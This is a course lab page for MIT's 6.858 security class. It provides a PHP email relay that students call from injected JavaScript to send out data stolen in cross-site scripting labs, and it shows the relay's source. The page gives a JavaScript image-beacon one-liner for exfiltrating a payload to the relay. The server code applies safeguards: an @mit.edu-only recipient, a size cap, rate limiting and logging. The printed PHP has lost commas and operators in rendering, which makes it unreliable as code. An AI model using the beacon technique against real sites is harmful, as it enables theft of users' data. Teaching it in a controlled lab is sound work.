Lab 4 Email Script

You can use this server side script to send automated emails from client-side JavaScript. For example, clicking this client-side hyperlink will cause an email to be sent by our web server (css.csail.mit.edu). Another copy of the email always goes to 6858-sendmail@lists.csail.mit.edu so that we can monitor abuse and you can receive credit for your work. (Don't worry about spamming our account while you test out your exploits; we will ignore mail to that address until we actually grade your submissions.)

(new Image()).src='http://css.csail.mit.edu/6.858/2017/labs/sendmail.php?' + 'to=your-mit-username@mit.edu' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 5, you'll probably want to use the JavaScript image technique shown above.)


(@mit.edu e-mail address)


(the information you stole)

Source code

In case you are curious, here is the source code of this page.


<?php
do {
    if (!
array_key_exists("to"$_REQUEST)) {
        break;
    }

    
$to filter_var($_REQUEST['to'], FILTER_SANITIZE_EMAIL);
    if (
$to === false) {
        
header("HTTP/1.0 400 Bad Request");
        echo 
"Invalid e-mail address given in to field";
        return;
    }

    if (!
array_key_exists("payload"$_REQUEST)) {
        
header("HTTP/1.0 400 Bad Request");
        echo 
"No payload given";
        return;
    }

    
$payload $_REQUEST['payload'];
    if (empty(
$payload)) {
        
header("HTTP/1.0 400 Bad Request");
        echo 
"Empty payload given";
        return;
    }

    if (
strlen($payload) > 100) {
        
header("HTTP/1.0 413 Payload Too Large");
        echo 
"Payload is larger than 100 bytes";
        return;
    }

    if (!
function_exists('apcu_add')) {
        
header("HTTP/1.0 501 Not Implemented");
        echo 
"APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (
apcu_add($payloadtrue5) === false) {
        
// exact same $payload was sent in the past 5 seconds
        
header("HTTP/1.0 429 Too Many Requests");
        echo 
"That exact payload was sent very recently; rejecting";
        return;
    }

    if (
substr(strrchr($to"@"), 1) !== "mit.edu") {
        
header("HTTP/1.0 403 Forbidden");
        echo 
"Please use an @mit.edu e-mail address, ";
        return;
    }

    
$grading stristr($_SERVER['HTTP_USER_AGENT'], "Lab Grader");

    
$logload str_replace(array("\n""\r"), '\n'$payload);
    
$logged true;
    if (
$grading) {
        
$logged $logged && openlog("6858.sendmail.grader"0LOG_MAIL);
        
$logged $logged && syslog(LOG_NOTICE"$to $logload");
    } else {
        
$logged $logged && openlog("6858.sendmail.students"0LOG_MAIL);
        
$logged $logged && syslog(LOG_INFO"$to $logload");
    }
    
$logged $logged && closelog();
    if (!
$logged) {
        
header("HTTP/1.0 503 Service Unavailable");
        echo 
"Failed to log mail request; not sending";
        return;
    }

    if (
$grading) {
        
header("HTTP/1.0 202 Accepted");
        echo 
"Payload logged";
        return;
    }

    
$from $to;
    
$subject "Message from $from";
    
$message "Payload:\n\n$payload";
    if (!
mail($to$subject$message)) {
        
header("HTTP/1.0 503 Service Unavailable");
        echo 
"Failed to relay e-mail to e-mail server";
        return;
    }

    echo 
"Sent!";
    return;
} while(
0);

$link "(new Image()).src="
      
"'http://css.csail.mit.edu/6.858/2017/labs/sendmail.php?'"
      
" + 'to=your-mit-username@mit.edu'"
      
" + '&payload=some-string' + '&random='"
      
" + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Email Script</title>
    </head>
    <body>
        <h1>Lab 4 Email Script</h1>
        <p>
            You can use this server side script to send automated emails from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause an email to be sent by our web server
            (css.csail.mit.edu). Another copy of the email always goes to
            6858-sendmail@lists.csail.mit.edu so that we can monitor abuse and
            you can receive credit for your work.  (Don't worry about spamming
            our account while you test out your exploits; we will ignore mail
            to that address until we actually grade your submissions.)
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well. Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="http://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 5, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="to">To:</label><br />
            <input name="to" placeholder="your-mit-username@mit.edu" size="40" />
            <i>(@mit.edu e-mail address)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Send Email" name="send_submit" />
        </form>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>